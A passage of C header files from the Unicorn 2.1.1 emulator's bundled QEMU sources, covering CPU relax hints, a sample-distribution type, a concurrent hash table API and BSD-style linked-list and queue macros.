res->tv_sec--; res->tv_usec = val1->tv_usec - val2->tv_usec + 1000 * 1000; } else { res->tv_usec = val1->tv_usec - val2->tv_usec; } } #else #define qemu_timersub timersub #endif /** * qemu_getauxval: * @type: the auxiliary vector key to lookup * * Search the auxiliary vector for @type, returning the value * or 0 if @type is not 
present.
 */
unsigned long qemu_getauxval(unsigned long type);

#endif

unicorn-2.1.1/qemu/include/qemu/processor.h

/*
 * Copyright (C) 2016, Emilio G. Cota <cota@braap.org>
 *
 * License: GNU GPL, version 2.
 * See the COPYING file in the top-level directory.
 */
#ifndef QEMU_PROCESSOR_H
#define QEMU_PROCESSOR_H

#include "qemu/atomic.h"

#if defined(__i386__) || defined(__x86_64__)
# define cpu_relax() asm volatile("rep; nop" ::: "memory")
#elif defined(__aarch64__)
# define cpu_relax() asm volatile("yield" ::: "memory")
#elif defined(__powerpc64__)
/* set Hardware Multi-Threading (HMT) priority to low; then back to medium */
# define cpu_relax() asm volatile("or 1, 1, 1;" \
                                  "or 2, 2, 2;" ::: "memory")
#else
# define cpu_relax() barrier()
#endif

#endif /* QEMU_PROCESSOR_H */

unicorn-2.1.1/qemu/include/qemu/qdist.h

/*
 * Copyright (C) 2016, Emilio G. Cota <cota@braap.org>
 *
 * License: GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */
#ifndef QEMU_QDIST_H
#define QEMU_QDIST_H

#include "qemu/bitops.h"

/*
 * Samples with the same 'x value' end up in the same qdist_entry,
 * e.g. inc(0.1) and inc(0.1) end up as {x=0.1, count=2}.
 *
 * Binning happens only at print time, so that we retain the flexibility to
 * choose the binning. This might not be ideal for workloads that do not care
 * much about precision and insert many samples all with different x values;
 * in that case, pre-binning (e.g. entering both 0.115 and 0.097 as 0.1)
 * should be considered.
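 *
 * A minimal usage sketch, based on the declarations below (names are
 * hypothetical):
 *
 *     struct qdist d;
 *     qdist_init(&d);
 *     qdist_inc(&d, 0.1);
 *     qdist_inc(&d, 0.1);    d now holds the entry {x=0.1, count=2}
 *     qdist_destroy(&d);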
 */
struct qdist_entry {
    double x;
    unsigned long count;
};

struct qdist {
    struct qdist_entry *entries;
    size_t n;
    size_t size;
};

#define QDIST_PR_BORDER     BIT(0)
#define QDIST_PR_LABELS     BIT(1)
/* the remaining options only work if PR_LABELS is set */
#define QDIST_PR_NODECIMAL  BIT(2)
#define QDIST_PR_PERCENT    BIT(3)
#define QDIST_PR_100X       BIT(4)
#define QDIST_PR_NOBINRANGE BIT(5)

void qdist_init(struct qdist *dist);
void qdist_destroy(struct qdist *dist);

void qdist_add(struct qdist *dist, double x, long count);
void qdist_inc(struct qdist *dist, double x);
double qdist_xmin(const struct qdist *dist);
double qdist_xmax(const struct qdist *dist);
double qdist_avg(const struct qdist *dist);
unsigned long qdist_sample_count(const struct qdist *dist);
size_t qdist_unique_entries(const struct qdist *dist);

/* Only qdist code and test code should ever call this function */
void qdist_bin__internal(struct qdist *to, const struct qdist *from, size_t n);

#endif /* QEMU_QDIST_H */

unicorn-2.1.1/qemu/include/qemu/qht.h

/*
 * Copyright (C) 2016, Emilio G. Cota <cota@braap.org>
 *
 * License: GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */
#ifndef QEMU_QHT_H
#define QEMU_QHT_H

// #include "qemu/seqlock.h"
#include "qemu/thread.h"
#include "qemu/qdist.h"

struct uc_struct;

typedef bool (*qht_cmp_func_t)(struct uc_struct *uc, const void *a,
                               const void *b);

struct qht {
    struct qht_map *map;
    qht_cmp_func_t cmp;
    unsigned int mode;
};

/**
 * struct qht_stats - Statistics of a QHT
 * @head_buckets: number of head buckets
 * @used_head_buckets: number of non-empty head buckets
 * @entries: total number of entries
 * @chain: frequency distribution representing the number of buckets in each
 *         chain, excluding empty chains.
 * @occupancy: frequency distribution representing chain occupancy rate.
 *             Valid range: from 0.0 (empty) to 1.0 (full occupancy).
 *
 * An entry is a pointer-hash pair.
 * Each bucket can host several entries.
 * Chains are chains of buckets, whose first link is always a head bucket.
 */
struct qht_stats {
    size_t head_buckets;
    size_t used_head_buckets;
    size_t entries;
    struct qdist chain;
    struct qdist occupancy;
};

typedef bool (*qht_lookup_func_t)(struct uc_struct *uc, const void *obj,
                                  const void *userp);
typedef void (*qht_iter_func_t)(struct uc_struct *uc, void *p, uint32_t h,
                                void *up);
typedef bool (*qht_iter_bool_func_t)(void *p, uint32_t h, void *up);

#define QHT_MODE_AUTO_RESIZE 0x1 /* auto-resize when heavily loaded */
#define QHT_MODE_RAW_MUTEXES 0x2 /* bypass the profiler (QSP) */

/**
 * qht_init - Initialize a QHT
 * @ht: QHT to be initialized
 * @cmp: default comparison function. Cannot be NULL.
 * @n_elems: number of entries the hash table should be optimized for.
* @mode: bitmask with OR'ed QHT_MODE_* */ void qht_init(struct qht *ht, qht_cmp_func_t cmp, size_t n_elems, unsigned int mode); /** * qht_destroy - destroy a previously initialized QHT * @ht: QHT to be destroyed * * Call only when there are no readers/writers left. */ void qht_destroy(struct qht *ht); /** * qht_insert - Insert a pointer into the hash table * @ht: QHT to insert to * @p: pointer to be inserted * @hash: hash corresponding to @p * @existing: address where the pointer to an existing entry can be copied to * * Attempting to insert a NULL @p is a bug. * Inserting the same pointer @p with different @hash values is a bug. * * In case of successful operation, smp_wmb() is implied before the pointer is * inserted into the hash table. * * Returns true on success. * Returns false if there is an existing entry in the table that is equivalent * (i.e. ht->cmp matches and the hash is the same) to @p-@h. If @existing * is !NULL, a pointer to this existing entry is copied to it. */ bool qht_insert(struct uc_struct *uc, struct qht *ht, void *p, uint32_t hash, void **existing); /** * qht_lookup_custom - Look up a pointer using a custom comparison function. * @ht: QHT to be looked up * @userp: pointer to pass to @func * @hash: hash of the pointer to be looked up * @func: function to compare existing pointers against @userp * * Needs to be called under an RCU read-critical section. * * smp_read_barrier_depends() is implied before the call to @func. * * The user-provided @func compares pointers in QHT against @userp. * If the function returns true, a match has been found. * * Returns the corresponding pointer when a match is found. * Returns NULL otherwise. */ void *qht_lookup_custom(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash, qht_lookup_func_t func); /** * qht_lookup - Look up a pointer in a QHT * @ht: QHT to be looked up * @userp: pointer to pass to the comparison function * @hash: hash of the pointer to be looked up * * Calls qht_lookup_custom() using @ht's default comparison function. */ void *qht_lookup(struct uc_struct *uc, const struct qht *ht, const void *userp, uint32_t hash); /** * qht_remove - remove a pointer from the hash table * @ht: QHT to remove from * @p: pointer to be removed * @hash: hash corresponding to @p * * Attempting to remove a NULL @p is a bug. * * Just-removed @p pointers cannot be immediately freed; they need to remain * valid until the end of the RCU grace period in which qht_remove() is called. * This guarantees that concurrent lookups will always compare against valid * data. * * Returns true on success. * Returns false if the @p-@hash pair was not found. */ bool qht_remove(struct qht *ht, const void *p, uint32_t hash); /** * qht_reset - reset a QHT * @ht: QHT to be reset * * All entries in the hash table are reset. No resizing is performed. * * If concurrent readers may exist, the objects pointed to by the hash table * must remain valid for the existing RCU grace period -- see qht_remove(). * See also: qht_reset_size() */ void qht_reset(struct qht *ht); /** * qht_reset_size - reset and resize a QHT * @ht: QHT to be reset and resized * @n_elems: number of entries the resized hash table should be optimized for. * * Returns true if the resize was necessary and therefore performed. * Returns false otherwise. * * If concurrent readers may exist, the objects pointed to by the hash table * must remain valid for the existing RCU grace period -- see qht_remove(). * See also: qht_reset(), qht_resize(). 
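 *
 * Usage sketch (illustrative, with a hypothetical table sized for 2^16
 * entries):
 *
 *     qht_reset_size(uc, &ht, 1 << 16);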
 */
bool qht_reset_size(struct uc_struct *uc, struct qht *ht, size_t n_elems);

/**
 * qht_resize - resize a QHT
 * @ht: QHT to be resized
 * @n_elems: number of entries the resized hash table should be optimized for
 *
 * Returns true on success.
 * Returns false if the resize was not necessary and therefore not performed.
 * See also: qht_reset_size().
 */
bool qht_resize(struct uc_struct *uc, struct qht *ht, size_t n_elems);

/**
 * qht_iter - Iterate over a QHT
 * @ht: QHT to be iterated over
 * @func: function to be called for each entry in QHT
 * @userp: additional pointer to be passed to @func
 *
 * Each time it is called, user-provided @func is passed a pointer-hash pair,
 * plus @userp.
 *
 * Note: @ht cannot be accessed from @func
 * See also: qht_iter_remove()
 */
void qht_iter(struct uc_struct *uc, struct qht *ht, qht_iter_func_t func,
              void *userp);

/**
 * qht_iter_remove - Iterate over a QHT, optionally removing entries
 * @ht: QHT to be iterated over
 * @func: function to be called for each entry in QHT
 * @userp: additional pointer to be passed to @func
 *
 * Each time it is called, user-provided @func is passed a pointer-hash pair,
 * plus @userp. If @func returns true, the pointer-hash pair is removed.
 *
 * Note: @ht cannot be accessed from @func
 * See also: qht_iter()
 */
void qht_iter_remove(struct uc_struct *uc, struct qht *ht,
                     qht_iter_bool_func_t func, void *userp);

/**
 * qht_statistics_init - Gather statistics from a QHT
 * @ht: QHT to gather statistics from
 * @stats: pointer to a &struct qht_stats to be filled in
 *
 * Does NOT need to be called under an RCU read-critical section,
 * since it does not dereference any pointers stored in the hash table.
 *
 * When done with @stats, pass the struct to qht_statistics_destroy().
 * Failing to do this will leak memory.
 */
void qht_statistics_init(const struct qht *ht, struct qht_stats *stats);

/**
 * qht_statistics_destroy - Destroy a &struct qht_stats
 * @stats: &struct qht_stats to be destroyed
 *
 * See also: qht_statistics_init().
 */
void qht_statistics_destroy(struct qht_stats *stats);

#endif /* QEMU_QHT_H */

unicorn-2.1.1/qemu/include/qemu/queue.h

/*      $NetBSD: queue.h,v 1.52 2009/04/20 09:56:08 mschuett Exp $ */

/*
 * QEMU version: Copy from netbsd, removed debug code, removed some of
 * the implementations. Left in singly-linked lists, lists, simple
 * queues, and tail queues.
 */

/*
 * Copyright (c) 1991, 1993
 *      The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3.
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)queue.h 8.5 (Berkeley) 8/20/94 */ #ifndef QEMU_SYS_QUEUE_H #define QEMU_SYS_QUEUE_H /* * This file defines four types of data structures: singly-linked lists, * lists, simple queues, and tail queues. * * A singly-linked list is headed by a single forward pointer. The * elements are singly linked for minimum space and pointer manipulation * overhead at the expense of O(n) removal for arbitrary elements. New * elements can be added to the list after an existing element or at the * head of the list. Elements being removed from the head of the list * should use the explicit macro for this purpose for optimum * efficiency. A singly-linked list may only be traversed in the forward * direction. Singly-linked lists are ideal for applications with large * datasets and few or no removals or for implementing a LIFO queue. * * A list is headed by a single forward pointer (or an array of forward * pointers for a hash table header). The elements are doubly linked * so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before * or after an existing element or at the head of the list. A list * may only be traversed in the forward direction. * * A simple queue is headed by a pair of pointers, one the head of the * list and the other to the tail of the list. The elements are singly * linked to save space, so elements can only be removed from the * head of the list. New elements can be added to the list after * an existing element, at the head of the list, or at the end of the * list. A simple queue may only be traversed in the forward direction. * * A tail queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or * after an existing element, at the head of the list, or at the end of * the list. A tail queue may be traversed in either direction. * * For details on the use of these macros, see the queue(3) manual page. */ /* * List definitions. */ #define QLIST_HEAD(name, type) \ struct name { \ struct type *lh_first; /* first element */ \ } #define QLIST_HEAD_INITIALIZER(head) \ { NULL } #define QLIST_ENTRY(type) \ struct { \ struct type *le_next; /* next element */ \ struct type **le_prev; /* address of previous next element */ \ } /* * List functions. 
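 *
 * Usage sketch (illustrative; the struct, field and variable names are
 * hypothetical):
 *
 *     struct Foo { int v; QLIST_ENTRY(Foo) next; };
 *     QLIST_HEAD(FooList, Foo) head = QLIST_HEAD_INITIALIZER(head);
 *     struct Foo *f = ...;
 *
 *     QLIST_INSERT_HEAD(&head, f, next);
 *     QLIST_FOREACH(f, &head, next) { ... }
 *     QLIST_REMOVE(f, next);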
*/ #define QLIST_INIT(head) do { \ (head)->lh_first = NULL; \ } while (/*CONSTCOND*/0) #define QLIST_SWAP(dstlist, srclist, field) do { \ void *tmplist; \ tmplist = (srclist)->lh_first; \ (srclist)->lh_first = (dstlist)->lh_first; \ if ((srclist)->lh_first != NULL) { \ (srclist)->lh_first->field.le_prev = &(srclist)->lh_first; \ } \ (dstlist)->lh_first = tmplist; \ if ((dstlist)->lh_first != NULL) { \ (dstlist)->lh_first->field.le_prev = &(dstlist)->lh_first; \ } \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_AFTER(listelm, elm, field) do { \ if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ (listelm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ (listelm)->field.le_next = (elm); \ (elm)->field.le_prev = &(listelm)->field.le_next; \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ *(listelm)->field.le_prev = (elm); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (/*CONSTCOND*/0) #define QLIST_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.le_next = (head)->lh_first) != NULL) \ (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ (head)->lh_first = (elm); \ (elm)->field.le_prev = &(head)->lh_first; \ } while (/*CONSTCOND*/0) #define QLIST_REMOVE(elm, field) do { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ (elm)->field.le_next = NULL; \ (elm)->field.le_prev = NULL; \ } while (/*CONSTCOND*/0) /* * Like QLIST_REMOVE() but safe to call when elm is not in a list */ #define QLIST_SAFE_REMOVE(elm, field) do { \ if ((elm)->field.le_prev != NULL) { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ (elm)->field.le_next = NULL; \ (elm)->field.le_prev = NULL; \ } \ } while (/*CONSTCOND*/0) /* Is elm in a list? */ #define QLIST_IS_INSERTED(elm, field) ((elm)->field.le_prev != NULL) #define QLIST_FOREACH(var, head, field) \ for ((var) = ((head)->lh_first); \ (var); \ (var) = ((var)->field.le_next)) #define QLIST_FOREACH_SAFE(var, head, field, next_var) \ for ((var) = ((head)->lh_first); \ (var) && ((next_var) = ((var)->field.le_next), 1); \ (var) = (next_var)) /* * List access methods. */ #define QLIST_EMPTY(head) ((head)->lh_first == NULL) #define QLIST_FIRST(head) ((head)->lh_first) #define QLIST_NEXT(elm, field) ((elm)->field.le_next) /* * Singly-linked List definitions. */ #define QSLIST_HEAD(name, type) \ struct name { \ struct type *slh_first; /* first element */ \ } #define QSLIST_HEAD_INITIALIZER(head) \ { NULL } #define QSLIST_ENTRY(type) \ struct { \ struct type *sle_next; /* next element */ \ } /* * Singly-linked List functions. 
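 *
 * Usage sketch (illustrative, hypothetical names):
 *
 *     struct Foo { int v; QSLIST_ENTRY(Foo) next; };
 *     QSLIST_HEAD(, Foo) head = QSLIST_HEAD_INITIALIZER(head);
 *
 *     QSLIST_INSERT_HEAD(&head, f, next);
 *     f = QSLIST_FIRST(&head);
 *     QSLIST_REMOVE_HEAD(&head, next);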
*/ #define QSLIST_INIT(head) do { \ (head)->slh_first = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_AFTER(slistelm, elm, field) do { \ (elm)->field.sle_next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = (elm); \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_HEAD(head, elm, field) do { \ (elm)->field.sle_next = (head)->slh_first; \ (head)->slh_first = (elm); \ } while (/*CONSTCOND*/0) #define QSLIST_INSERT_HEAD_ATOMIC(head, elm, field) do { \ typeof(elm) save_sle_next; \ do { \ save_sle_next = (elm)->field.sle_next = (head)->slh_first; \ } while (atomic_cmpxchg(&(head)->slh_first, save_sle_next, (elm)) != \ save_sle_next); \ } while (/*CONSTCOND*/0) #define QSLIST_MOVE_ATOMIC(dest, src) do { \ (dest)->slh_first = atomic_xchg(&(src)->slh_first, NULL); \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE_HEAD(head, field) do { \ typeof((head)->slh_first) elm = (head)->slh_first; \ (head)->slh_first = elm->field.sle_next; \ elm->field.sle_next = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE_AFTER(slistelm, field) do { \ typeof(slistelm) next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = next->field.sle_next; \ next->field.sle_next = NULL; \ } while (/*CONSTCOND*/0) #define QSLIST_REMOVE(head, elm, type, field) do { \ if ((head)->slh_first == (elm)) { \ QSLIST_REMOVE_HEAD((head), field); \ } else { \ struct type *curelm = (head)->slh_first; \ while (curelm->field.sle_next != (elm)) \ curelm = curelm->field.sle_next; \ curelm->field.sle_next = curelm->field.sle_next->field.sle_next; \ (elm)->field.sle_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSLIST_FOREACH(var, head, field) \ for((var) = (head)->slh_first; (var); (var) = (var)->field.sle_next) #define QSLIST_FOREACH_SAFE(var, head, field, tvar) \ for ((var) = QSLIST_FIRST((head)); \ (var) && ((tvar) = QSLIST_NEXT((var), field), 1); \ (var) = (tvar)) /* * Singly-linked List access methods. */ #define QSLIST_EMPTY(head) ((head)->slh_first == NULL) #define QSLIST_FIRST(head) ((head)->slh_first) #define QSLIST_NEXT(elm, field) ((elm)->field.sle_next) /* * Simple queue definitions. */ #define QSIMPLEQ_HEAD(name, type) \ struct name { \ struct type *sqh_first; /* first element */ \ struct type **sqh_last; /* addr of last next element */ \ } #define QSIMPLEQ_HEAD_INITIALIZER(head) \ { NULL, &(head).sqh_first } #define QSIMPLEQ_ENTRY(type) \ struct { \ struct type *sqe_next; /* next element */ \ } /* * Simple queue functions. 
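 *
 * Usage sketch (illustrative, hypothetical names):
 *
 *     struct Foo { int v; QSIMPLEQ_ENTRY(Foo) entry; };
 *     QSIMPLEQ_HEAD(, Foo) q = QSIMPLEQ_HEAD_INITIALIZER(q);
 *
 *     QSIMPLEQ_INSERT_TAIL(&q, f, entry);
 *     f = QSIMPLEQ_FIRST(&q);
 *     QSIMPLEQ_REMOVE_HEAD(&q, entry);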
*/ #define QSIMPLEQ_INIT(head) do { \ (head)->sqh_first = NULL; \ (head)->sqh_last = &(head)->sqh_first; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (head)->sqh_first = (elm); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ *(head)->sqh_last = (elm); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (listelm)->field.sqe_next = (elm); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_HEAD(head, field) do { \ typeof((head)->sqh_first) elm = (head)->sqh_first; \ if (((head)->sqh_first = elm->field.sqe_next) == NULL) \ (head)->sqh_last = &(head)->sqh_first; \ elm->field.sqe_next = NULL; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_SPLIT_AFTER(head, elm, field, removed) do { \ QSIMPLEQ_INIT(removed); \ if (((removed)->sqh_first = (head)->sqh_first) != NULL) { \ if (((head)->sqh_first = (elm)->field.sqe_next) == NULL) { \ (head)->sqh_last = &(head)->sqh_first; \ } \ (removed)->sqh_last = &(elm)->field.sqe_next; \ (elm)->field.sqe_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE(head, elm, type, field) do { \ if ((head)->sqh_first == (elm)) { \ QSIMPLEQ_REMOVE_HEAD((head), field); \ } else { \ struct type *curelm = (head)->sqh_first; \ while (curelm->field.sqe_next != (elm)) \ curelm = curelm->field.sqe_next; \ if ((curelm->field.sqe_next = \ curelm->field.sqe_next->field.sqe_next) == NULL) \ (head)->sqh_last = &(curelm)->field.sqe_next; \ (elm)->field.sqe_next = NULL; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_FOREACH(var, head, field) \ for ((var) = ((head)->sqh_first); \ (var); \ (var) = ((var)->field.sqe_next)) #define QSIMPLEQ_FOREACH_SAFE(var, head, field, next) \ for ((var) = ((head)->sqh_first); \ (var) && ((next = ((var)->field.sqe_next)), 1); \ (var) = (next)) #define QSIMPLEQ_CONCAT(head1, head2) do { \ if (!QSIMPLEQ_EMPTY((head2))) { \ *(head1)->sqh_last = (head2)->sqh_first; \ (head1)->sqh_last = (head2)->sqh_last; \ QSIMPLEQ_INIT((head2)); \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_PREPEND(head1, head2) do { \ if (!QSIMPLEQ_EMPTY((head2))) { \ *(head2)->sqh_last = (head1)->sqh_first; \ (head1)->sqh_first = (head2)->sqh_first; \ QSIMPLEQ_INIT((head2)); \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_LAST(head, type, field) \ (QSIMPLEQ_EMPTY((head)) ? \ NULL : \ ((struct type *)(void *) \ ((char *)((head)->sqh_last) - offsetof(struct type, field)))) /* * Simple queue access methods. */ #define QSIMPLEQ_EMPTY_ATOMIC(head) (atomic_read(&((head)->sqh_first)) == NULL) #define QSIMPLEQ_EMPTY(head) ((head)->sqh_first == NULL) #define QSIMPLEQ_FIRST(head) ((head)->sqh_first) #define QSIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) typedef struct QTailQLink { void *tql_next; struct QTailQLink *tql_prev; } QTailQLink; /* * Tail queue definitions. The union acts as a poor man template, as if * it were QTailQLink<type>. 
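 *
 * For instance, QTAILQ_HEAD(FooHead, Foo) below expands to a union holding
 * both a struct Foo *tqh_first and the type-erased QTailQLink used for
 * backwards traversal.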
*/ #define QTAILQ_HEAD(name, type) \ union name { \ struct type *tqh_first; /* first element */ \ QTailQLink tqh_circ; /* link for circular backwards list */ \ } #define QTAILQ_HEAD_INITIALIZER(head) \ { .tqh_circ = { NULL, &(head).tqh_circ } } #define QTAILQ_ENTRY(type) \ union { \ struct type *tqe_next; /* next element */ \ QTailQLink tqe_circ; /* link for circular backwards list */ \ } /* * Tail queue functions. */ #define QTAILQ_INIT(head) do { \ (head)->tqh_first = NULL; \ (head)->tqh_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ (head)->tqh_first->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ else \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ (head)->tqh_first = (elm); \ (elm)->field.tqe_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_circ.tql_prev = (head)->tqh_circ.tql_prev; \ (head)->tqh_circ.tql_prev->tql_next = (elm); \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ else \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ (listelm)->field.tqe_next = (elm); \ (elm)->field.tqe_circ.tql_prev = &(listelm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.tqe_circ.tql_prev = (listelm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_next = (listelm); \ (listelm)->field.tqe_circ.tql_prev->tql_next = (elm); \ (listelm)->field.tqe_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_REMOVE(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ (elm)->field.tqe_circ.tql_prev; \ else \ (head)->tqh_circ.tql_prev = (elm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_circ.tql_prev->tql_next = (elm)->field.tqe_next; \ (elm)->field.tqe_circ.tql_prev = NULL; \ (elm)->field.tqe_circ.tql_next = NULL; \ (elm)->field.tqe_next = NULL; \ } while (/*CONSTCOND*/0) /* remove @left, @right and all elements in between from @head */ #define QTAILQ_REMOVE_SEVERAL(head, left, right, field) do { \ if (((right)->field.tqe_next) != NULL) \ (right)->field.tqe_next->field.tqe_circ.tql_prev = \ (left)->field.tqe_circ.tql_prev; \ else \ (head)->tqh_circ.tql_prev = (left)->field.tqe_circ.tql_prev; \ (left)->field.tqe_circ.tql_prev->tql_next = (right)->field.tqe_next; \ } while (/*CONSTCOND*/0) #define QTAILQ_FOREACH(var, head, field) \ for ((var) = ((head)->tqh_first); \ (var); \ (var) = ((var)->field.tqe_next)) #define QTAILQ_FOREACH_SAFE(var, head, field, next_var) \ for ((var) = ((head)->tqh_first); \ (var) && ((next_var) = ((var)->field.tqe_next), 1); \ (var) = (next_var)) #define QTAILQ_FOREACH_REVERSE(var, head, field) \ for ((var) = QTAILQ_LAST(head); \ (var); \ (var) = QTAILQ_PREV(var, field)) #define QTAILQ_FOREACH_REVERSE_SAFE(var, head, field, prev_var) \ for ((var) = QTAILQ_LAST(head); \ (var) && ((prev_var) = QTAILQ_PREV(var, field), 1); \ (var) = (prev_var)) /* * Tail queue access methods. 
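 *
 * Usage sketch (illustrative, hypothetical names):
 *
 *     struct Foo { int v; QTAILQ_ENTRY(Foo) entry; };
 *     QTAILQ_HEAD(, Foo) q = QTAILQ_HEAD_INITIALIZER(q);
 *
 *     QTAILQ_INSERT_TAIL(&q, f, entry);
 *     QTAILQ_FOREACH(f, &q, entry) { ... }
 *     QTAILQ_FOREACH_REVERSE(f, &q, entry) { ... }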
*/ #define QTAILQ_EMPTY(head) ((head)->tqh_first == NULL) #define QTAILQ_FIRST(head) ((head)->tqh_first) #define QTAILQ_NEXT(elm, field) ((elm)->field.tqe_next) #define QTAILQ_IN_USE(elm, field) ((elm)->field.tqe_circ.tql_prev != NULL) #define QTAILQ_LINK_PREV(link) \ ((link).tql_prev->tql_prev->tql_next) #ifndef _MSC_VER #define QTAILQ_LAST(head) \ ((typeof((head)->tqh_first)) QTAILQ_LINK_PREV((head)->tqh_circ)) #define QTAILQ_PREV(elm, field) \ ((typeof((elm)->field.tqe_next)) QTAILQ_LINK_PREV((elm)->field.tqe_circ)) #else #define QTAILQ_LAST(head) \ (QTAILQ_LINK_PREV((head)->tqh_circ)) #define QTAILQ_PREV(elm, field) \ (QTAILQ_LINK_PREV((elm)->field.tqe_circ)) #endif #define field_at_offset(base, offset, type) \ ((type *) (((char *) (base)) + (offset))) /* * Raw access of elements of a tail queue head. Offsets are all zero * because it's a union. */ #define QTAILQ_RAW_FIRST(head) \ field_at_offset(head, 0, void *) #define QTAILQ_RAW_TQH_CIRC(head) \ field_at_offset(head, 0, QTailQLink) /* * Raw access of elements of a tail entry */ #define QTAILQ_RAW_NEXT(elm, entry) \ field_at_offset(elm, entry, void *) #define QTAILQ_RAW_TQE_CIRC(elm, entry) \ field_at_offset(elm, entry, QTailQLink) /* * Tail queue traversal using pointer arithmetic. */ #define QTAILQ_RAW_FOREACH(elm, head, entry) \ for ((elm) = *QTAILQ_RAW_FIRST(head); \ (elm); \ (elm) = *QTAILQ_RAW_NEXT(elm, entry)) /* * Tail queue insertion using pointer arithmetic. */ #define QTAILQ_RAW_INSERT_TAIL(head, elm, entry) do { \ *QTAILQ_RAW_NEXT(elm, entry) = NULL; \ QTAILQ_RAW_TQE_CIRC(elm, entry)->tql_prev = QTAILQ_RAW_TQH_CIRC(head)->tql_prev; \ QTAILQ_RAW_TQH_CIRC(head)->tql_prev->tql_next = (elm); \ QTAILQ_RAW_TQH_CIRC(head)->tql_prev = QTAILQ_RAW_TQE_CIRC(elm, entry); \ } while (/*CONSTCOND*/0) #define QLIST_RAW_FIRST(head) \ field_at_offset(head, 0, void *) #define 